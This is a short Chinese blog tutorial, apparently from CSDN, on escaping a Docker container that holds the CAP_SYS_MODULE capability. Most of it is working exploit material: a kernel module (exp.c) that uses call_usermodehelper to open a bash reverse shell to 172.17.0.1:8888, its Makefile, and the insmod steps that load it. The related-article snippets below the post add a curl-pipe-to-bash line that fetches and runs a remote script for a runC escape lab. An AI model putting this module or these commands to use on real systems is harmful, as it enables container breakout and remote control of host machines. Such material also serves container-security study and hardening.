云安全(2)--CAP_SYS_MODULE逃逸

已于 2023-10-20 19:38:40 修改
阅读量381 收藏 2
点赞数 1
文章标签: 安全
于 2023-10-20 19:36:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/azraelxuemo/article/details/133952825
版权

文章目录

测试环境配置

docker run -it --cap-add=SYS_MODULE  ubuntu:18.04

实际环境利用

cat /proc/self/status|grep Cap

请添加图片描述
然后使用capsh decode一下

capsh --decode=00000000a80525fb

请添加图片描述
发现有CAP_SYS_MODULE权限,那么直接往内核注入恶意module,我们直接在容器里面安装必备的东西

apt update&&apt install -y gcc make  vim  linux-headers-$(uname -r) kmod

exp.c

#include <linux/module.h>
MODULE_LICENSE("GPL");
char *argv[] = {
    "/bin/bash",
    "-c",    
    "bash -i >&/dev/tcp/172.17.0.1/8888 0>&1",
    NULL    
};
static int __init connect_back_init(void)
{

    return call_usermodehelper(
        argv[0],     
        argv,        
        NULL,        
        UMH_WAIT_EXEC // don't wait for program return status
    );
}

static void __exit connect_back_exit(void)
{
}

module_init(connect_back_init);
module_exit(connect_back_exit);

Makefile

obj-m += exp.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) clean

make all编译一下

insmod exp.ko //就会反弹shell
rmmod exp.ko
azraelxuemo
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cap_pam_modulation.rar_CAP modulation_CAP-Modulation_Cap__PAM调制解
07-13
carrierless amplitude phase modulation CAP调制解调的通信系统
解决:Loading kernel module CAP_SYS_MODULE CAP_NET_ADMIN alias netdev-eth0 instead
weixin_34106122的博客
09-24 976
克隆虚拟机、启动、配置网络、重启网络服务遇到如下问题:[root@localhost ~]# service network restart Loading kernel module for a network device with CAP_SYS_MODULE (deprecated). Use CAP_NET_ADMIN and alias netdev-eth0 ...
Linux 日志:Loading kernel module for a network device with CAP_SYS_MODULE (deprecated)
mzhan017的博客
08-06 1159
CAP_SYS_MODULE已经被遗弃,不再使用,如果有module 还在使用的话,就会打印这条log;希望引起module开发者的注意,尽快使用新的选项。 pr_warn("Loading kernel module for a network device with CAP_SYS_MODULE (deprecated). Use CAP_NET_ADMIN and alias netdev-%s instead.\n", /linux-3.10.0-862.14.4.el7/net/core/d.
linux特权模式,linuxea:docker特权模式与--cap-add和--cap-drop
weixin_29189003的博客
05-13 1380
你可能希望在容器中执行的一些高级操作(例如Docker-in-Docker(DinD),NTP,安装环回设备等),默认情况下将需要比给予容器的root用户更高的权限。因此,需要允许其他特权才能使容器无问题地运行,因此对于该用例,Docker具有非常简单但非常宽泛的特权模式,可将完整主机的功能添加到容器中。要使用此模式,只是追加--privileged到docker run命令:Docker-in-...
HackTheBox-Monitors WP
h1nt的博客
10-23 2802
0x01 端口探测 使用nmap对靶机端口进行探测: nmap -sC -sV -v 10.10.10.238 发现只有两个端口是开着的: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e
linux setcap命令详解(包括各个cap的使用举例)
xdy762024688的博客
08-11 1628
1)从2.1版开始,Linux内核有了能力(capability)的概念,即它打破了UNIX/LINUX操作系统中超级用户/普通用户的概念,由普通用户也可以做只有超级用户可以完成的工作.Capabilities的主要思想在于分割root用户的特权,即将root的特权分割成不同的能力,每种能力代表一定的特权操作。例如:能力CAP_SYS_MODULE表示用户能够加载(或卸载)内核模块的特权操作,而CAP_SETUID表示用户能够修改进程用户身份的特权操作。
Linux设备驱动-模块卸载过程
一起学嵌入式
12-08 3016
开篇 上一篇文章分析了内核模块的加载过程: Linux设备驱动-模块加载过程 这篇文章来讲讲内核模块的卸载过程机制。 本文引用的内核代码参考来自版本 linux-5.15.4 。 在用户空间,通过指令 rmmod 可以将一个内核模块从系统中卸载,使用方法如下: rmmod xx /* 卸载已经加载的内核模块 xx */ 注意,卸载内核模块需要具有 CAP_SYS_MODULE 权限(root用户或者其他具有这个权限的用户),否则会加载失败。 rmmod 指令通过系统调用 sys_modu
Linux内核之capabilities能力(十七)
Android系统攻城狮
09-19 1971
Capabilities的主要思想在于分割root用户的特权,即将root的特权分割成不同的能力,每种能力代表一定的特权操作。例如:能力CAP_SYS_MODULE表示用户能够加载(或卸载)内核模块的特权操作,而CAP_SETUID表示用户能够修改进程用户身份的特权操作。在Capbilities中系统将根据进程拥有的能力来进行特权操作的访问控制。 在Capilities中,只有进程和可执行文件才具有能力,每个进程拥有三组能力集,分别称为cap_effective, cap_inheritabl...
容器逃逸漏洞分析 CAP_SYS_MODULE
最新发布
weixin_31610083的博客
01-03 425
本文简要介绍了Linux的CAP_SYS_MODULE能力,以及具有该能力的容器是如何加载恶意内核模块并完成逃逸的过程。
[转载] Linux的capability深入分析
a172742451的专栏
04-21 2675
[转载] Linux的capability深入分析 一)概述: 1)从2.1版开始,Linux内核有了能力(capability)的概念,即它打破了UNIX/LINUX操作系统中超级用户/普通用户的概念,由普通用户也可以做只有超级用户可以完成的工作. 2)capability可以作用在进程上(受限),也可以作用在程序文件上,它与sudo不同,sudo只针对用户/程序/文件的概
centos系统-docker容器逃逸
suo_y的博客
04-20 1332
docker-runc CVE-2019-5736(runC容器逃逸漏洞) 1、准备漏洞环境: curl https://gist.githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw -o install.sh && bash install.sh 2、下载poc,编译脚本 a)下载poc:https://github.com/Frichetten/CVE-2019-5736-PoC b)修改payload
cap-video.rar_cap_video cap_摄像头
09-24
用 摄像 头 捕 捉照片
bcd-to-excess-3.zip_BCD to excess-3_micro-cap
09-20
micro cap development
PWM-CAP.zip_28335 cap_28335 cap_28335 pwm_PWM波生成
09-24
基于28335的pwm波生成与捕获模块的教学的例程
CAP-GIO-MAI.rar__gio
09-24
So do tuyen cap di mai fg
使用docker run --cap-add参数解决权限问题(无法使用gdb调试、无法date -s修改时间)
热门推荐
liuqiuyuewo的博客
07-11 2万+
问题 在docker容器中的centos无法使用gdb调试 ptrace: Operation not permitted 解决方法 参考:https://stackoverflow.com/questions/42029834/gdb-in-docker-container-returns-ptrace-operation-not-permitted 在docker run 命令中...
【Docker capability】docker capability 属性功能介绍(docker运行时权限、Linux系统功能)
叮当猫的喵i
01-05 1196
出于容器之间和容器与宿主机的安全隔离保护,在默认的Docker配置下,Docker容器是没有系统权限的。这是因为在默认情况下,容器内的进程不允许访问任何宿主机上的设备。默认的seccomp配置文件将根据所选的功能进行调整,以允许使用功能所允许的功能,所以从Docker1.12之后的版本,不应该对此进行调整。时,将允许Docker容器访问宿主机上的所有设备,并在AppArmor或SELinux中设置一些配置,使容器内的进程可以与容器外运行的进程几乎一样权限来访问宿主机。如果想限制对特定设备的访问,可以使用。
linux设备驱动读书笔记
sure365的专栏
12-26 2171
 设备驱动简介 机制:提供什么能力策略:如何使用这些能力在编写驱动时, 程序员应当编写内核代码来存取硬件, 但是不能强加特别的策略给用户, 因为不同的用户有不同的需求. 驱动应当做到使硬件可用, 将所有关于如何使用硬件的事情留给应用程序编写驱动需要注意的地方:必须注意并发/重入的问题内核空间和用户空间不能直接操作,必须通过特别的函数(copy_from_user/copy_to_u
介绍-Linux capability机制
ty的专栏
03-05 4829
对Linux的capability机制进行详细介绍,并带有例子代码,说明一个普通进程如何获取某项权限。
docker run -itd --restart=always --privileged --cap-add SYS_PTRACE --name prod-env-xy
05-20
这是一个Docker命令,意思是在后台以特权模式和系统级别的调试权限启动一个名为"prod-env-xy"的容器。其中: - `-itd` 表示以交互式终端方式运行容器,并在后台运行。 - `--restart=always` 表示容器会在停止后自动重启。 - `--privileged` 表示容器以特权模式运行,拥有访问主机系统所有设备和文件的权限。 - `--cap-add SYS_PTRACE` 表示容器拥有系统级别的调试权限。 - `--name prod-env-xy` 表示给容器取一个别名为"prod-env-xy"。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值